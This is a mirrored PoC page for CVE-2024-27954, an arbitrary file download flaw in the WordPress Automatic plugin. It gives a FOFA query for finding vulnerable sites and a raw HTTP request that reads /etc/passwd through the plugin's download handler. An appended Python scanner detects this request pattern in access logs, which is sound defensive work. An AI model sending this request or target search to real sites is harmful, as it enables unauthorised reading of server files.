mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-05-29 01:30:21 +00:00
20 lines
526 B
Markdown
## WordPress Automatic Plugin Arbitrary File Download Vulnerability (CVE-2024-27954)

## fofa

```
"/wp-content/plugins/wp-automatic"
```

## poc

```
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
```
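
Added example (not part of the original PoC repository): a defender-side check that scans web access logs for the request shape shown above, i.e. `wp_automatic=download` together with a `link` parameter, and grades hits by the scheme of `link`. Combined log format is assumed; the function names `classify` and `scan`, the sample log lines and the addresses in them are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry: "METHOD target HTTP/x"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def classify(target):
    """Return a finding dict if the request target uses the download handler, else None."""
    query = urlsplit(target).query
    # parse_qs percent-decodes values, so link=file%3A%2F%2F... is normalised too
    params = parse_qs(query, keep_blank_values=True)
    # Value compared case-insensitively to err on the side of flagging
    if "download" not in [v.lower() for v in params.get("wp_automatic", [])]:
        return None
    links = params.get("link", [])
    if not links:
        return None
    link = links[0].strip()
    scheme = urlsplit(link).scheme.lower()
    # file:// matches the PoC on this page; other schemes are only marked for
    # review (assumption: any hit on this handler from outside deserves a look)
    severity = "high" if scheme == "file" else "review"
    return {"link": link, "scheme": scheme, "severity": severity}

def scan(lines):
    """Return findings for every log line whose request matches, with line number and client."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        hit = classify(m.group("target")) if m else None
        if hit:
            hit.update(line=n, client=line.split(" ", 1)[0])
            findings.append(hit)
    return findings

# Constructed sample log lines (documentation address ranges, not real traffic)
SAMPLE = [
    '203.0.113.7 - - [29/May/2025:01:30:21 +0000] "GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [29/May/2025:01:30:25 +0000] "GET /?p=12 HTTP/1.1" 200 8421 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [29/May/2025:01:31:02 +0000] "GET /?wp_automatic=download&link=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1" 200 1532 "-" "curl/8.0"',
    '198.51.100.8 - - [29/May/2025:01:32:40 +0000] "GET /?wp_automatic=download&link=https%3A%2F%2Fexample.org%2Ffeed.xml HTTP/1.1" 200 990 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A `high` hit paired with a 200 response and a body size consistent with the requested file is the case to triage first.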